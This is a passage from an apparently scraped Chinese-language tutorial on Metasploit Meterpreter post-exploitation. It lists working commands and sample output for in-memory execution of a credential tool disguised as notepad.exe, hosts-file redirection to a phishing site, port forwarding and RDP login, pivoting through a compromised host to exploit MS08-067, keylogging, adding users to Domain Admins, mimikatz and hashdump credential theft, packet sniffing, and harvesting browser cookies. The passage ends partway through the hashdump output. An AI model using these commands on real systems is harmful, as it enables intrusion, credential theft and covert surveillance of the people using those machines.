\u8fd9\u8fbe\u5230\u7684\u6548\u679c\u5c31\u8ddf\u4f7f\u7528shell\u547d\u4ee4\u4e00\u6837\u4e86<\/p>\n\n\n\n

\u518d\u6765\u4e00\u4e2a\uff0c\u5728\u76ee\u6807\u4e3b\u673a\u5185\u5b58\u4e2d\u76f4\u63a5\u6267\u884c\u6211\u4eec\u653b\u51fb\u4e3b\u673a\u4e0a\u7684\u653b\u51fb\u7a0b\u5e8f\uff0c\u6bd4\u5982wce.exe\uff0c\u53c8\u6bd4\u5982\u6728\u9a6c\u7b49\uff0c\u8fd9\u6837\u53ef\u4ee5\u907f\u514d\u653b\u51fb\u7a0b\u5e8f\u5b58\u50a8\u5230\u76ee\u6807\u4e3b\u673a\u786c\u76d8\u4e0a\u88ab\u53d1\u73b0\u6216\u88ab\u67e5\u6740\u3002<\/p>\n\n\n\n

execute  -H -m -d notepad.exe-f  wce.exe -a “-o wce.txt”<\/p>\n\n\n\n

-d \u5728\u76ee\u6807\u4e3b\u673a\u6267\u884c\u65f6\u663e\u793a\u7684\u8fdb\u7a0b\u540d\u79f0\uff08\u7528\u4ee5\u4f2a\u88c5\uff09<\/p>\n\n\n\n

-m \u76f4\u63a5\u4ece\u5185\u5b58\u4e2d\u6267\u884c<\/p>\n\n\n\n

 “-o wce.txt”\u662fwce.exe\u7684\u8fd0\u884c\u53c2\u6570<\/p>\n\n\n\n

(7)idletime\u547d\u4ee4<\/p>\n\n\n\n

\u201cidletime\u201d\u547d\u4ee4\u4e3a\u663e\u793a\u76ee\u6807\u673a\u5668\u622a\u6b62\u5230\u5f53\u524d\u65e0\u64cd\u4f5c\u547d\u4ee4\u7684\u65f6\u95f4\u3002\u56fe\u4e2d\u7684\u663e\u793a\u610f\u601d\u4e3a\u76ee\u6807\u4e3b\u673a\u6709\u64cd\u4f5c\u662f\u57289\u520619\u79d2\u4e4b\u524d\u3002<\/p>\n\n\n\n

\"\"\/<\/a><\/figure>\n\n\n\n

(8)search\u547d\u4ee4<\/p>\n\n\n\n

\u201csearch\u201c\u547d\u4ee4\u5728\u76ee\u6807\u4e3b\u673a\u641c\u7d22\u7279\u5b9a\u7684\u6587\u4ef6\u3002\u8be5\u547d\u4ee4\u80fd\u591f\u901a\u8fc7\u641c\u7d22\u6574\u4e2a\u7cfb\u7edf\u6216\u7279\u5b9a\u7684\u6587\u4ef6\u5939\u3002<\/p>\n\n\n\n

\u4f7f\u7528\u201csearch \u2013h\u201d\u547d\u4ee4\u6765\u67e5\u770bsearch\u547d\u4ee4\u7684\u5e2e\u52a9\u4fe1\u606f\uff1a<\/p>\n\n\n\n

\u4e0b\u56fe\u4e2d\uff0c\u201csearch \u2013f aa.txt\u201d\u547d\u4ee4\u4e3a\u67e5\u770b\u76ee\u6807\u673a\u4e2d\u5728\u5f53\u524d\u76ee\u5f55\u4ee5\u53ca\u5f53\u524d\u76ee\u5f55\u7684\u5b50\u76ee\u5f55\u4e2d\u6709\u6ca1\u6709aa.txt\u8fd9\u4e2a\u6587\u4ef6\uff0c\u82e5\u6709\u5219\u663e\u793a\u51fa\u5176\u8def\u5f84\u3002<\/p>\n\n\n\n

\u201csearch \u2013f l*.txt c:\\\\pp\u201d\u4e3a\u663e\u793a\u51fac:\\\\pp\u4e0b\u53capp\u6587\u4ef6\u5939\u4e0b\u6240\u6709\u7684\u5b50\u6587\u4ef6\u4e0b\u6240\u6709\u4ee5l\u5f00\u5934\u7684txt\u6587\u4ef6\uff0c\u82e5\u6709\u6b64\u7c7b\u6587\u4ef6\uff0c\u5219\u8fd4\u56de\u5176\u8def\u5f84\u548c\u5176\u5927\u5c0f\u3002<\/p>\n\n\n\n

(9)edit\u547d\u4ee4<\/p>\n\n\n\n

\u8c03\u7528vi\u7f16\u8f91\u5668\uff0c\u5bf9\u76ee\u6807\u4e3b\u673a\u4e0a\u7684\u6587\u4ef6\u4fee\u6539<\/p>\n\n\n\n

\u4f8b\u5982\u4fee\u6539\u76ee\u6807\u4e3b\u673a\u4e0a\u7684hosts\u6587\u4ef6\uff0c\u4f7f\u5f97\u76ee\u6807\u4e3b\u673a\u8bbf\u95eebaidu\u65f6\u53bb\u5230\u51c6\u5907\u597d\u7684\u9493\u9c7c\u7f51\u7ad9\uff08\u4ec5\u9650\u5b9e\u9a8c\u7528\u9014\uff09<\/p>\n\n\n\n

\"\"
\u5728\u76ee\u6807\u4e3b\u673a\u4e0aping www.baidu.com\uff0c\u51fa\u6765\u7684\u76ee\u6807IP\u5c31\u662f\u6211\u4eec\u4fee\u6539\u7684192.168.1.1\u4e86
\"\"<\/p>\n\n\n\n

3.\u7f51\u7edc\u547d\u4ee4<\/p>\n\n\n\n

ipconfig\/ifconfig#\u663e\u793a\u7f51\u7edc\u63a5\u53e3\u7684\u5173\u952e\u4fe1\u606f\uff0c\u5305\u62ec IP \u5730\u5740<\/p>\n\n\n\n

portfwd -h<\/p>\n\n\n\n

\u7528\u6cd5\uff1aportfwd [-h] [add | delete | list | flush] [args]<\/p>\n\n\n\n

\u9009\u9879\uff1a<\/p>\n\n\n\n

    -L <opt>\u8981\u76d1\u542c\u7684\u672c\u5730\u4e3b\u673a\uff08\u53ef\u9009\uff09<\/p>\n\n\n\n

    -h\u5e2e\u52a9\u6a2a\u5e45<\/p>\n\n\n\n

    -l <opt>\u8981\u76d1\u542c\u7684\u672c\u5730\u7aef\u53e3<\/p>\n\n\n\n

    -p <opt>\u8fde\u63a5\u5230\u7684\u8fdc\u7a0b\u7aef\u53e3<\/p>\n\n\n\n

    -r <opt>\u8981\u8fde\u63a5\u5230\u7684\u8fdc\u7a0b\u4e3b\u673a<\/p>\n\n\n\n

portfwd  add -l 4444 -p 3389 -r 192.168.1.102 # \u7aef\u53e3\u8f6c\u53d1,\u672c\u673a\u76d1\u542c4444,\u628a\u76ee\u6807\u673a3389\u8f6c\u5230\u672c\u673a4444<\/p>\n\n\n\n

netstat -an | grep\u201c4444″  #\u67e5\u770b\u6307\u5b9a\u7aef\u53e3\u5f00\u653e\u60c5\u51b5<\/p>\n\n\n\n

rdesktop -u Administrator -p bk#123 127.0.0.1:4444 #\u4f7f\u7528rdesktop\u6765\u8fde\u63a5\u684c\u9762\uff0c-u \u7528\u6237\u540d -p \u5bc6\u7801<\/p>\n\n\n\n

rdesktop 127.1.1.0:4444 #\u9700\u8981\u8f93\u5165\u7528\u6237\u540d\u548c\u5bc6\u7801\u8fdc\u7a0b\u8fde\u63a5<\/p>\n\n\n\n

route#\u67e5\u770b\u6216\u4fee\u6539\u53d7\u5bb3\u8005\u8def\u7531\u8868<\/p>\n\n\n\n

route add 192.168.1.0 255.255.255.0 1 #\u6dfb\u52a0\u52a8\u6001\u8def\u7531<\/p>\n\n\n\n

route print #\u8def\u7531\u8868\u8f93\u51fa<\/p>\n\n\n\n

runget_local_subnets #\u76ee\u6807\u4e3b\u673a\u7684\u5185\u7f51IP\u6bb5\u60c5\u51b5<\/p>\n\n\n\n

Arp       #\u770bARP\u7f13\u51b2\u8868<\/p>\n\n\n\n

Getproxy     #\u83b7\u53d6\u4ee3\u7406<\/p>\n\n\n\n

\uff081\uff09portfwd<\/p>\n\n\n\n

\u7f51\u7edc\u547d\u4ee4\u5219\u6709\u5217\u51faip\u4fe1\u606f(ipconfig),\u5c55\u793a\u4fee\u6539\u8def\u7531\u8868(route),\u8fd8\u6709\u7aef\u53e3\u8f6c\u53d1(portfwd)\u3002 \u6bd4\u5982portfwd\uff1a<\/p>\n\n\n\n

\"enter<\/figure>\n\n\n\n

\u5728\u5efa\u7acb\u89c4\u5219\u4e4b\u540e\u5c31\u53ef\u4ee5\u8fde\u63a5\u672c\u57303344\u7aef\u53e3\uff0c\u8fd9\u6837\u8fdc\u7a0b\u76843389\u7aef\u53e3\u5c31\u8f6c\u53d1\u51fa\u6765\u4e86\u3002<\/p>\n\n\n\n

(2)route<\/p>\n\n\n\n

\u4f7f\u7528route\u547d\u4ee4\u53ef\u4ee5\u501f\u52a9meterpreter\u4f1a\u8bdd\u8fdb\u4e00\u6b65msf\u6e17\u900f\u5185\u7f51\uff0c\u6211\u4eec\u5df2\u7ecf\u62ff\u4e0b\u5e76\u4ea7\u751fmeterpreter\u53cd\u5f39\u4f1a\u8bdd\u7684\u4e3b\u673a\u53ef\u80fd\u51fa\u4e8e\u5185\u7f51\u4e4b\u4e2d\uff0c\u5916\u6709\u4e00\u5c42NAT\uff0c\u6211\u4eec\u65e0\u6cd5\u76f4\u63a5\u5411\u5176\u5185\u7f51\u4e2d\u5176\u4ed6\u4e3b\u673a\u53d1\u8d77\u653b\u51fb\uff0c\u5219\u53ef\u4ee5\u501f\u52a9\u5df2\u4ea7\u751f\u7684meterpreter\u4f1a\u8bdd\u4f5c\u4e3a\u8def\u7531\u8df3\u677f\uff0c\u653b\u51fb\u5185\u7f51\u5176\u5b83\u4e3b\u673a\u3002<\/p>\n\n\n\n

\u53ef\u4ee5\u5148\u4f7f\u7528run get_local_subnets\u547d\u4ee4\u67e5\u770b\u5df2\u62ff\u4e0b\u7684\u76ee\u6807\u4e3b\u673a\u7684\u5185\u7f51IP\u6bb5\u60c5\u51b5<\/p>\n\n\n\n

\u547d\u4ee4\uff1arun  get_local_subnets<\/p>\n\n\n\n

\u5982\u4e0b\u56fe\uff1a<\/p>\n\n\n\n

\"\"\/<\/figure>\n\n\n\n

\u5176\u5185\u7f51\u6709192.168.249.0\/24\u7f51\u6bb5\uff0c\u6211\u4eec\u65e0\u6cd5\u76f4\u63a5\u8bbf\u95ee<\/p>\n\n\n\n

\u4e0b\u9762\u505a\u4e00\u6761\u8def\u7531\uff0c\u4e0b\u4e00\u8df3\u4e3a\u5f53\u524d\u62ff\u4e0b\u4e3b\u673a\u7684sessionid\uff08\u76ee\u524d\u4e3a5\uff09\uff0c\u5373\u6240\u6709\u5bf9249\u7f51\u6bb5\u7684\u653b\u51fb\u6d41\u91cf\u90fd\u901a\u8fc7\u5df2\u6e17\u900f\u7684\u8fd9\u53f0\u76ee\u6807\u4e3b\u673a\u7684meterpreter\u4f1a\u8bdd\u6765\u4f20\u9012\u3002<\/p>\n\n\n\n

\u547d\u4ee4\uff1aroute add  192.168.249.0 255.255.255.0 5<\/p>\n\n\n\n

\u518d\u4f7f\u7528route print\u67e5\u770b\u4e00\u4e0b\u8def\u7531\u8868\uff0c\u6548\u679c\u5982\u4e0b\u56fe\uff1a<\/p>\n\n\n\n

\"\"
\u6700\u540e\u6211\u4eec\u5c31\u53ef\u4ee5\u901a\u8fc7\u8fd9\u6761\u8def\u7531\uff0c\u4ee5\u5f53\u524d\u62ff\u4e0b\u7684\u4e3b\u673ameterpreter\u4f5c\u4e3a\u8def\u7531\u8df3\u677f\u653b\u51fb249\u7f51\u6bb5\u4e2d\u53e6\u4e00\u53f0\u6709ms08-067\u6f0f\u6d1e\u7684\u4e3b\u673a\uff0c\u83b7\u5f97\u53cd\u5f39\u4f1a\u8bdd\u6210\u529f\u987a\u5229\u62ff\u4e0b\u4e86\u53e6\u4e00\u53f0\u5185\u7f51\u4e3b\u673a192.168.249.1\uff0c\u5982\u4e0b\u56fe\uff1a<\/p>\n\n\n\n

\"\"\/<\/figure>\n\n\n\n

\u5927\u591a\u65f6\u5019\u6211\u4eec\u83b7\u53d6\u5230\u7684meterpreter shell\u5904\u4e8e\u5185\u7f51\uff0c\u800c\u6211\u4eec\u9700\u8981\u4ee3\u7406\u5230\u76ee\u6807\u5185\u7f51\u73af\u5883\u4e2d\uff0c\u626b\u63cf\u5176\u5185\u7f51\u670d\u52a1\u5668\u3002\u8fd9\u65f6\u53ef\u4ee5\u4f7f\u7528route\u529f\u80fd\uff0c\u6dfb\u52a0\u4e00\u6761\u901a\u5411\u76ee\u6807\u670d\u52a1\u5668\u5185\u7f51\u7684\u8def\u7531\u3002<\/p>\n\n\n\n

\u67e5\u770bshell\u7f51\u7edc\u73af\u5883\uff1a<\/p>\n\n\n\n

meterpreter>run get_local_subnets<\/p>\n\n\n\n

\u6dfb\u52a0\u4e00\u6761\u901a\u5411\u76ee\u6807\u670d\u52a1\u5668\u5185\u7f51\u7684\u8def\u7531<\/p>\n\n\n\n

meterpreter>run autoroute -s 100.0.0.0\/8   #(\u6839\u636e\u76ee\u6807\u5185\u7f51\u7f51\u7edc\u800c\u5b9a)<\/p>\n\n\n\n

\u67e5\u770b\u8def\u7531\u8bbe\u7f6e\uff1a<\/p>\n\n\n\n

meterpreter>run autoroute \u2013p<\/p>\n\n\n\n

\u4e00\u822c\u6765\u8bf4\uff0c\u5728meterpreter\u4e2d\u8bbe\u7f6e\u8def\u7531\u4fbf\u53ef\u4ee5\u8fbe\u5230\u901a\u5f80\u5176\u5185\u7f51\u7684\u76ee\u7684\u3002\u7136\u800c\u6709\u4e9b\u65f6\u5019\u8fd8\u662f\u4f1a\u5931\u8d25\uff0c\u8fd9\u65f6\u6211\u4eec\u53ef\u4ee5background\u8fd4\u56demsf>\uff0c\u67e5\u770b\u4e0b\u5916\u9762\u7684\u8def\u7531\u60c5\u51b5\u3002<\/p>\n\n\n\n

route print<\/p>\n\n\n\n

\u5982\u679c\u53d1\u73b0\u6ca1\u6709\u8def\u7531\u4fe1\u606f\uff0c\u8bf4\u660emeterpreter shell\u8bbe\u7f6e\u7684\u8def\u7531\u5e76\u6ca1\u6709\u751f\u6548\uff0c\u6211\u4eec\u53ef\u4ee5\u5728msf\u4e2d\u6dfb\u52a0\u8def\u7531\u3002<\/p>\n\n\n\n

msf>route add 10.0.0.0 255.0.0.0 1<\/p>\n\n\n\n

\u8bf4\u660e\uff1a1\u8868\u793asession 1\uff0c\u653b\u51fb\u673a\u5982\u679c\u8981\u53bb\u8bbf\u95ee10.0.0.0\/8\u7f51\u6bb5\u7684\u8d44\u6e90\uff0c\u5176\u4e0b\u4e00\u8df3\u662fsession1\uff0c\u81f3\u4e8e\u4ec0\u4e48\u662f\u4e0b\u4e00\u6761\u8fd9\u91cc\u4e0d\u591a\u8bf4\u4e86\uff0c\u53cd\u6b63\u5c31\u662f\u76ee\u524d\u653b\u51fb\u673a\u53ef\u4ee5\u8bbf\u95ee\u5185\u7f51\u8d44\u6e90\u4e86\u3002<\/p>\n\n\n\n

4.\u952e\u76d8\u76d1\u542c<\/p>\n\n\n\n

Meterpreter\u8fd8\u53ef\u4ee5\u5728\u76ee\u6807\u8bbe\u5907\u4e0a\u5b9e\u73b0\u952e\u76d8\u8bb0\u5f55\u529f\u80fd\uff0c\u952e\u76d8\u8bb0\u5f55\u4e3b\u8981\u6d89\u53ca\u4ee5\u4e0b\u4e09\u79cd\u547d\u4ee4\uff1a<\/p>\n\n\n\n

keyscan_start\uff1a\u5f00\u542f\u952e\u76d8\u8bb0\u5f55\u529f\u80fd<\/p>\n\n\n\n

keyscan_dump\uff1a\u663e\u793a\u6355\u6349\u5230\u7684\u952e\u76d8\u8bb0\u5f55\u4fe1\u606f<\/p>\n\n\n\n

keyscan_stop\uff1a\u505c\u6b62\u952e\u76d8\u8bb0\u5f55\u529f\u80fd<\/p>\n\n\n\n

uictl enable keyboard\/mouse#\u63a5\u7ba1\u76ee\u6807\u4e3b\u673a\u7684\u952e\u76d8\u548c\u9f20\u6807\u3002<\/p>\n\n\n\n

meterpreter > keyscan_start #\u9488\u5bf9\u8fdc\u7a0b\u76ee\u6807\u4e3b\u673a\u5f00\u542f\u952e\u76d8\u8bb0\u5f55\u529f\u80fd<\/p>\n\n\n\n

Starting the keystroke sniffer…<\/p>\n\n\n\n

meterpreter > keyscan_dump #\u5b58\u50a8\u76ee\u6807\u4e3b\u673a\u4e0a\u6355\u83b7\u7684\u952e\u76d8\u8bb0\u5f55<\/p>\n\n\n\n

Dumping captured keystrokes…<\/p>\n\n\n\n

dir <Return> cd<Ctrl>  <LCtrl><\/p>\n\n\n\n

meterpreter > keyscan_stop #\u505c\u6b62\u9488\u5bf9\u76ee\u6807\u4e3b\u673a\u7684\u952e\u76d8\u8bb0\u5f55<\/p>\n\n\n\n

Stopping the keystroke sniffer…<\/p>\n\n\n\n

\"enter<\/figure>\n\n\n\n

\u8fd9\u91cc\u9700\u8981\u6ce8\u610f\u4e00\u4e0bwindows\u4f1a\u8bdd\u7a97\u53e3\u7684\u6982\u5ff5\uff0cwindows\u684c\u9762\u5212\u5206\u4e3a\u4e0d\u540c\u7684\u4f1a\u8bdd(session)\uff0c\u4ee5\u4fbf\u4e8e\u4e0ewindows\u4ea4\u4e92\u3002\u4f1a\u8bdd0\u4ee3\u8868\u63a7\u5236\u53f0\uff0c1\uff0c2\u4ee3\u8868\u8fdc\u7a0b\u684c\u9762\u3002\u6240\u4ee5\u8981\u622a\u83b7\u952e\u76d8\u8f93\u5165\u5fc5\u987b\u57280\u4e2d\u8fdb\u884c\u3002\u53ef\u4ee5\u4f7f\u7528getdesktop\u67e5\u770b\u6216\u8005\u622a\u5f20\u56fe\u8bd5\u8bd5\u3002\u5426\u5219\u4f7f\u7528setdesktop\u5207\u6362\u3002<\/p>\n\n\n\n

\"enter<\/figure>\n\n\n\n

\u5982\u679c\u4e0d\u884c\u5c31\u5207\u6362\u5230explorer.exe\u8fdb\u7a0b\u4e2d\uff0c\u8fd9\u6837\u4e5f\u53ef\u4ee5\u76d1\u542c\u5230\u8fdc\u7a0b\u684c\u9762\u8fde\u63a5\u8fdb\u6765\u4e4b\u540e\u7684\u952e\u76d8\u8f93\u5165\u6570\u636e\u3002<\/p>\n\n\n\n

5.\u7cfb\u7edf\u547d\u4ee4<\/p>\n\n\n\n

reboot#\u91cd\u65b0\u542f\u52a8\u53d7\u5bb3\u4eba\u7684\u8ba1\u7b97\u673a<\/p>\n\n\n\n

reg#\u4e0e\u53d7\u5bb3\u4eba\u7684\u6ce8\u518c\u8868\u8fdb\u884c\u4ea4\u4e92<\/p>\n\n\n\n

rev2self#\u56de\u5230\u63a7\u5236\u76ee\u6807\u4e3b\u673a\u7684\u521d\u59cb\u7528\u6237\u8d26\u6237\u4e0b<\/p>\n\n\n\n

shell#\u83b7\u5f97\u63a7\u5236\u53f0\u6743\u9650<\/p>\n\n\n\n

shutdown#\u5173\u95ed\u4e86\u53d7\u5bb3\u8005\u7684\u8ba1\u7b97\u673a<\/p>\n\n\n\n

sysinfo # \u67e5\u770b\u76ee\u6807\u673a\u7cfb\u7edf\u4fe1\u606f\uff0c\u5982\u673a\u5668\u540d\uff0c\u64cd\u4f5c\u7cfb\u7edf\u7b49<\/p>\n\n\n\n

add_user username password -h ip    #\u5728\u8fdc\u7a0b\u76ee\u6807\u4e3b\u673a\u4e0a\u6dfb\u52a0\u4e00\u4e2a\u7528\u6237<\/p>\n\n\n\n

add_group_user “Domain Admins” username -h ip    #\u5c06\u7528\u6237\u6dfb\u52a0\u5230\u76ee\u6807\u4e3b\u673a\u7684\u57df\u7ba1\u7406\u5458\u7ec4\u4e2d<\/p>\n\n\n\n

shell\u547d\u4ee4<\/p>\n\n\n\n

\u83b7\u53d6\u76ee\u6807\u4e3b\u673a\u7684\u8fdc\u7a0b\u547d\u4ee4\u884cshell,\u5982\u679c\u51fa\u9519\uff0c\u8003\u8651\u662f\u76ee\u6807\u4e3b\u673a\u9650\u5236\u4e86cmd.exe\u7684\u8bbf\u95ee\u6743\uff0c\u53ef\u4ee5\u4f7f\u7528migrate\u6ce8\u5165\u5230\u7ba1\u7406\u5458\u7528\u6237\u8fdb\u7a0b\u4e2d\u518d\u5c1d\u8bd5<\/p>\n\n\n\n

\"\"\/<\/figure>\n\n\n\n

6.mimikatz<\/p>\n\n\n\n

meterpreter > load mimikatz  #\u52a0\u8f7dmimikatz<\/p>\n\n\n\n

meterpreter > msv #\u83b7\u53d6hash\u503c<\/p>\n\n\n\n

meterpreter > kerberos #\u83b7\u53d6\u660e\u6587<\/p>\n\n\n\n

meterpreter >ssp   #\u83b7\u53d6\u660e\u6587\u4fe1\u606f<\/p>\n\n\n\n

meterpreter > wdigest #\u83b7\u53d6\u7cfb\u7edf\u8d26\u6237\u4fe1\u606f<\/p>\n\n\n\n

meterpreter >mimikatz_command -f a::   #\u5fc5\u987b\u8981\u4ee5\u9519\u8bef\u7684\u6a21\u5757\u6765\u8ba9\u6b63\u786e\u7684\u6a21\u5757\u663e\u793a<\/p>\n\n\n\n

meterpreter >mimikatz_command -f hash::   #\u83b7\u53d6\u76ee\u6807 hash<\/p>\n\n\n\n

meterpreter > mimikatz_command -f samdump::hashes<\/p>\n\n\n\n

meterpreter > mimikatz_command -f sekurlsa::searchPasswords<\/p>\n\n\n\n

\"\u8fd9\u91cc\u5199\u56fe\u7247\u63cf\u8ff0\"\/<\/figure>\n\n\n\n

7.\u7f51\u7edc\u55c5\u63a2<\/p>\n\n\n\n

meterpreter > use sniffer # \u52a0\u8f7d\u55c5\u63a2\u6a21\u5757<\/p>\n\n\n\n

Loading extension sniffer…success.<\/p>\n\n\n\n

meterpreter > sniffer_interfaces #\u5217\u51fa\u76ee\u6807\u4e3b\u673a\u6240\u6709\u5f00\u653e\u7684\u7f51\u7edc\u63a5\u53e3<\/p>\n\n\n\n

    1 – ‘WAN Miniport (Network Monitor)’ ( type:3 mtu:1514 usable:true dhcp:false wifi:false )<\/p>\n\n\n\n

    2 – ‘Intel(R) PRO\/1000 MT Desktop Adapter’ ( type:0 mtu:1514 usable:true dhcp:true wifi:false )<\/p>\n\n\n\n

    3 – ‘Cisco Systems VPN Adapter’ ( type:4294967295 mtu:0 usable:false dhcp:false wifi:false )<\/p>\n\n\n\n

meterpreter > sniffer_start 2 #\u83b7\u53d6\u6b63\u5728\u5b9e\u65bd\u55c5\u63a2\u7f51\u7edc\u63a5\u53e3\u7684\u7edf\u8ba1\u6570\u636e<\/p>\n\n\n\n

[*] Capture started on interface 2 (50000 packet buffer)<\/p>\n\n\n\n

meterpreter > sniffer_dump 2 \/tmp\/test2.cap #\u5728\u76ee\u6807\u4e3b\u673a\u4e0a\u9488\u5bf9\u7279\u5b9a\u8303\u56f4\u7684\u6570\u636e\u5305\u7f13\u51b2\u533a\u542f\u52a8\u55c5\u63a2<\/p>\n\n\n\n

[*] Flushing packet capture buffer for interface 2…<\/p>\n\n\n\n

[*] Flushed 1176 packets (443692 bytes)<\/p>\n\n\n\n

[*] Downloaded 100% (443692\/443692)…<\/p>\n\n\n\n

[*] Download completed, converting to PCAP…<\/p>\n\n\n\n

[*] PCAP file written to \/tmp\/test2.cap<\/p>\n\n\n\n

meterpreter > sniffer_stop  2   #\u505c\u6b62\u55c5\u63a2<\/p>\n\n\n\n

Metasploit\u5305\u542bsniffer\u811a\u672c\u3002Meterpreter\u7684\u8fd9\u4e2a\u6a21\u5757\u53ef\u4ee5\u7528\u6765\u505a\u6570\u636e\u5305\u6355\u83b7,\u4e0d\u9700\u8981\u5728\u8fdc\u7a0b\u673a\u5668\u4e0a\u5b89\u88c5\u4efb\u4f55\u8f6f\u4ef6\uff1a<\/p>\n\n\n\n

\u9996\u5148\u6267\u884cuse sniffer\u547d\u4ee4\u4f5c\u7528\u4e3a\u4f7f\u7528\u55c5\u63a2\u811a\u672c\u3002<\/p>\n\n\n\n

\"\"\/<\/a><\/figure>\n\n\n\n

sniffer_interfaces\u547d\u4ee4\u4e3a\u83b7\u53d6\u7f51\u5361\u7684\u4fe1\u606f\uff0c\u5f97\u5230\u6211\u4eec\u7684ID\u4e3a1.<\/p>\n\n\n\n

\"\"\/<\/a><\/figure>\n\n\n\n

sniffer_start ID\u547d\u4ee4\u5f00\u59cb\u55c5\u63a2\u3002<\/p>\n\n\n\n

\"\"\/<\/a><\/figure>\n\n\n\n

sniffer_dump ID filepath\u4fdd\u5b58\u6293\u53d6\u7684\u6570\u636e\u5305\uff0c\u672c\u4f8b\u4e2d\/tmp\/1.cap\u662f\u6293\u53d6\u6570\u636e\u5305\u7684\u4fdd\u5b58\u8def\u5f84\u3002<\/p>\n\n\n\n

\"\"\/<\/a><\/figure>\n\n\n\n
\"\u8fd9\u91cc\u5199\u56fe\u7247\u63cf\u8ff0\"\/<\/figure>\n\n\n\n

\u5bf9\u6293\u53d6\u7684\u5305\u8fdb\u884c\u89e3\u5305\uff1a<\/p>\n\n\n\n

use auxiliary\/sniffer\/psnuffle<\/p>\n\n\n\n

set pcapfile 1.cap<\/p>\n\n\n\n

run<\/p>\n\n\n\n

\"20161006153844\"\/<\/figure>\n\n\n\n

\u7136\u540e\u5728shell\u4e2d\u4e2d\u8f93\u5165\uff1awireshark\uff0c\u52a0\u8f7d\u8fd9\u4e2a\/tmp\/xpsp1.cap\u5305\u5373\u53ef\uff1a<\/p>\n\n\n\n

\"\"\/<\/figure>\n\n\n\n

8.\u83b7\u53d6\u654f\u611f\u4fe1\u606f<\/p>\n\n\n\n

run post\/windows\/gather\/checkvm #\u662f\u5426\u865a\u62df\u673a<\/p>\n\n\n\n

run post\/windows\/gather\/enum_applications #\u83b7\u53d6\u5b89\u88c5\u8f6f\u4ef6\u4fe1\u606f<\/p>\n\n\n\n

run post\/windows\/gather\/dumplinks   #\u83b7\u53d6\u6700\u8fd1\u7684\u6587\u4ef6\u64cd\u4f5c<\/p>\n\n\n\n

run post\/windows\/gather\/enum_ie  #\u83b7\u53d6IE\u7f13\u5b58<\/p>\n\n\n\n

run post\/windows\/gather\/enum_chrome   #\u83b7\u53d6Chrome\u7f13\u5b58<\/p>\n\n\n\n

run scraper                      #\u83b7\u53d6\u5e38\u89c1\u4fe1\u606f<\/p>\n\n\n\n

#\u4fdd\u5b58\u5728\uff5e\/.msf4\/logs\/scripts\/scraper\/\u76ee\u5f55\u4e0b<\/p>\n\n\n\n

(1)post\/windows\/gather\/enum_application\u6a21\u5757\u83b7\u53d6\u76ee\u6807\u4e3b\u673a\u4e0a\u7684\u8f6f\u4ef6\u5b89\u88c5\u4fe1\u606f<\/p>\n\n\n\n

\u547d\u4ee4\uff1arun post\/windows\/gather\/enum_applications<\/p>\n\n\n\n

\u6548\u679c\u5982\u56fe\uff1a<\/p>\n\n\n\n

\"\"\/<\/figure>\n\n\n\n

(2) post\/windows\/gather\/enum_ie\u540e\u6e17\u900f\u6a21\u5757\uff0c\u8bfb\u53d6\u76ee\u6807\u4e3b\u673aIE\u6d4f\u89c8\u5668cookies\u7b49\u7f13\u5b58\u4fe1\u606f\uff0c\u55c5\u63a2\u76ee\u6807\u4e3b\u673a\u767b\u5f55\u8fc7\u7684\u5404\u7c7b\u8d26\u53f7\u5bc6\u7801<\/p>\n\n\n\n

\u547d\u4ee4\uff1arun  post\/windows\/gather\/enum_ie<\/p>\n\n\n\n

\u6548\u679c\u5982\u4e0b\u56fe\uff1a<\/p>\n\n\n\n

\"\"\/<\/figure>\n\n\n\n

\u83b7\u53d6\u5230\u7684\u76ee\u6807\u4e3b\u673a\u4e0a\u7684ie\u6d4f\u89c8\u5668\u7f13\u5b58\u5386\u53f2\u8bb0\u5f55\u548ccookies\u4fe1\u606f\u7b49\u90fd\u4fdd\u5b58\u5230\u4e86\u653b\u51fb\u4e3b\u673a\u672c\u5730\u7684\/root\/.msf5\/loot\/\u76ee\u5f55\u4e0b,\u8fd9\u91cc\u8bf4IE7\u4ee5\u4e0a\u624d\u6709\u6548<\/p>\n\n\n\n

9.\u83b7\u53d6Hash<\/p>\n\n\n\n

\u4f7f\u7528\u201chashdump\u201d\u547d\u4ee4\u53ef\u4ee5\u4ece\u7cfb\u7edf\u63d0\u53d6\u7528\u6237\u540d\u548c\u5bc6\u7801hashes\u3002\u4f7f\u7528hashdump\u547d\u4ee4\u53ef\u4ee5\u83b7\u53d6\u76ee\u6807\u4e3b\u673a\u7684SAM\u6587\u4ef6\uff0c\u83b7\u53d6\u76ee\u6807\u4e3b\u673a\u7684\u8d26\u53f7\u5bc6\u7801hash\u4fe1\u606f\uff0c\u5269\u4e0b\u7684\u53ef\u4ee5\u7528\u7206\u7834\u8f6f\u4ef6\u7b97\u51fa\u660e\u6587\u5bc6\u7801\uff0c\u5fae\u8f6f\u4e00\u822c\u7528LM,NTML\u548cNTLMv2\u5f62\u5f0f\u7684\u54c8\u5e0c\u8868\u5b58\u50a8\u5bc6\u7801\u3002\u82e5\u60f3\u8fd0\u884c\u8fd9\u4e2a\u547d\u4ee4, \u9700\u8981\u6709\u6ce8\u518c\u8868\u548cSAM [Security Account Manager]\u7684\u7cfb\u7edf\u7684\u6743\u9650\uff0c\u5982\u679c\u4f60\u662f\u4f5c\u4e3a\u4e00\u4e2a\u666e\u901a\u7684\u7528\u6237\u767b\u9646\u7684\u8bdd\uff0c\u4f60\u9700\u8981\u63d0\u5347\u6743\u9650,\u8fd9\u6211\u4eec\u5c06\u5728\u540e\u9762\u63d0\u5230\u3002<\/p>\n\n\n\n

meterpreter > run post\/windows\/gather\/smart_hashdump<\/p>\n\n\n\n

[*] Running module against TESTING<\/p>\n\n\n\n

[*] Hashes will be saved to the database if one is connected.<\/p>\n\n\n\n

[*] Hashes will be saved in loot in JtR password file format to:<\/p>\n\n\n\n

[*] \/home\/croxy\/.msf4\/loot\/20150929225044_default_10.0.2.15_windows.hashes_407551.txt<\/p>\n\n\n\n

[*] Dumping password hashes…<\/p>\n\n\n\n

[*] Running as SYSTEM extracting hashes from registry<\/p>\n\n\n\n

[*]     Obtaining the boot key…<\/p>\n\n\n\n

[*]     Calculating the hboot key using SYSKEY 8c2c8d96e92a8ccfc407a1ca48531239…<\/p>\n\n\n\n

[*]     Obtaining the user list and keys…<\/p>\n\n\n\n

[*]     Decrypting user keys…<\/p>\n\n\n\n

[*]     Dumping password hints…<\/p>\n\n\n\n

[+]Croxy:”Whoareyou”<\/p>\n\n\n\n

[*]     Dumping password hashes…<\/p>\n\n\n\n

